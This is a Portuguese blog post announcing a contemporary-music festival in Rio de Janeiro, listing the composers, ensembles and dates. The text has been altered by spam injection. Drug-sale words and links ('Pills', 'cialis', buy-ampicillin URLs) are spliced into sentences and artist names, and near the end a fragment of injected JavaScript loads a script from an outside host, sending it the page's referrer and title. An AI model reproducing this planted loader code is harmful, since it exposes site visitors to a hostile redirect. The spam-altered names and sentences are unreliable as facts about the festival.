LateralMúsica contemporâneaProgramaçãoRio de Janeiro

Um mundo de compositores reunido no RJ

Festival Internacional Compositores de Hoje chega a sua 2º edição reunindo obras de 30 autores mundiais.

 

Trinta compositores de 13 países mostram suas obras no 2º Festival Internacional Compositores de Hoje, que ocorre de 18 a 23 de novembro, sempre às 19h, no Centro Cultural da Justiça Federal, no Centro do Rio de Janeiro. Autores argentinos, australianos, colombianos, escoceses, espanhóis, gregos, ingleses, islandeses, italianos, mexicanos, norte-americanos e portugueses, bem como brasileiros de cinco estados diferentes, terão obras interpretadas por músicos nacionais e estrangeiros, promovendo intercâmbio entre criador, intérprete e público. O evento é produzido e concebido pelo também compositor Sergio Roberto de Oliveira.

No dia 18/11, terça, o festival é aberto com uma mesa-redonda com compositores, aberta ao público, sobre a situação da música de hoje: o que se tem conquistado e os desafios pela frente.

Os concertos têm início na quinta-feira, dia 20/11, com o pré-lançamento do CD Enlarge Your Sax online , do saxofonista carioca Pedro Bittencourt, tocando música eletroacústica. “O CD é fruto das minhas colaborações de longo prazo com compositores, iniciadas durante residências artísticas no ZKM, em Karlsruhe, Alemanha. As peças reunidas nesse concerto são para sax e computador (música mista)”, diz Bittencourt.

No dia 21, a islandesa Pills Eva Ingolf, ganhadora do prêmio New York Women Composers 2014, apresenta recital de violino solo com obras selecionadas do documentário My Dad’s Violin, do projeto Fifteen Minutes of Fame, do grupo de compositores Vox Novus, e obras da New York Women Composers.

No sábado, dia 22, o grupo norte-americano Mélomanie lança no Brasil seu CD Excursions, interpretando música contemporânea em instrumentos de música antiga. A palavra francesa himalaya speman price in kuwait cystone order mélomanie http://www.kintuadi-asso.org/buy-ampicillin-online-without-script/ significa “mania de música”, mas também pode ser traduzida como “amor pela música”. Em seus concertos, o Mélomanie apresenta pares provocativos de obras antigas e contemporâneas em instrumentos do período barroco, em colaborações criativas com intérpretes e compositores convidados. Seu repertório contemporâneo traz obras dos séculos 20 e 21, incluindo estreias mundiais escritas especialmente para o grupo.

Encerrando a programação, no dia 23, o octeto de violoncelos de Uberlândia Order Udi Cello Ensemble cialis commercial actors  (na foto do post) interpreta um vasto repertório com obras de Alexandre Schubert, Caio Senna, Liduino Pitombeira, Dimitri Cervo, Beetholven Cunha, entre outros. O grupo é dirigido por Kayami Satomi, professor de violoncelo da Universidade Federal de Uberlândia. Criado em 2009, o ensemble inclui em seu repertório obras nacionais e contemporâneas, sendo mais de 20 estreias mundiais, em sua maioria obras dedicadas ao grupo.

 

Serviço:

2º Festival Internacional Compositores de Hoje

De 18 a 23 de novembro, sempre às 19h

Centro Cultural Justiça Federal (Av. Rio Branco, 241, Centro, Rio de Janeiro)

Preço: R$ 10

Censura: Livre

 

Programação:

18/11 – Mesa-redonda Os desafios e conquistas da música de hoje
20/11 – Pedro Bittencourt – lançamento do CD Enlarge Your Sax Purchase (Brasil/Rio de Janeiro – saxofone e eletrônicos)
21/11 – Eva Ingolf (Islândia – violino solo)
22/11 – Mélomanie – lançamento do CD Excursions (EUA – flauta barroca, violino barroco, cravo, viola da gamba e violoncelo barroco)
23/11 – UDI Cello Ensemble (Brasil/Uberlândia – octeto de violoncelos)

}s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.